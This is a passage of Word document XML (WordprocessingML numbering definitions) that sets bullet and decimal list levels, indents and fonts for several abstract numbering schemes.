        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4022D48A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7613" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="373669E0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9544" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="31ECBB16">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11475" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="C458EA04">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13406" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="302A479E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15337" w:hanging="361"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="231B72ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9450589E"/>
    <w:lvl w:ilvl="0" w:tplc="FAB468B2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1006" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E7703E30">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2124" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0B0C1FE4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2120" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BE50A3FE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4255" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B8B698BA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6390" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A4EA298A">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8525" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E8989336">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10660" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="11F66456">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12795" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="BE08D8BC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14930" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="23DB3AE8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="399EC446"/>
    <w:lvl w:ilvl="0" w:tplc="680CEE84">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="912" w:hanging="449"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D812B870">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1553" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3C1C6230">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1789" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="3326B794">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1780" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="37B0A69E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4268" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="943403C6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6757" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="30B4D05C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9245" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="08089EF4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11734" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8D242F64">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="14222" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2483748F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7E2125A"/>
    <w:lvl w:ilvl="0" w:tplc="7032BF6E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1045" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7DB041C6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1765" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A21CAB80">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2485" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DBF49E30">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4570" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="202A75BC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6660" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="10888BCC">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8750" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B81802E6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10840" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7206CD26">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="12930" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A3DCD9DA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15020" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="26FB36AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43A474A6"/>
    <w:lvl w:ilvl="0" w:tplc="60A626BA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1561" w:hanging="488"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1F6A8AA0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2154" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="81B69CB6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4053" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="748CACF8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5946" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="21EA70C6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7840" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="D162363C">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9733" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="20BE9E6E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11626" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="91947E3E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13520" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A8240B7E">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="15413" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="28F04B80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8AD4548C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2061" w:hanging="1408"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2061" w:hanging="1408"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2061" w:hanging="1408"/>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
        <w:b/>
        <w:bCs/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="56"/>
        <w:szCs w:val="56"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1704" w:hanging="721"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="48"/>
        <w:szCs w:val="48"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2416" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="100"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5216" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8013" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10810" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13606" w:hanging="452"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="295615F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="136A29DA"/>
    <w:lvl w:ilvl="0" w:tplc="D5BAE4AE">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1042" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:sz w:val="44"/>
        <w:szCs w:val="44"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6DAA6AA2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1512" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="default"/>
        <w:spacing w:val="0"/>
        <w:w w:val="99"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="24AAD9DA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3484" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="1EEA46A0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5448" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CD105E72">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7413" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AA6A4ED4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9377" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="739A5872">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="11342" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="97028CE2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="13306" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
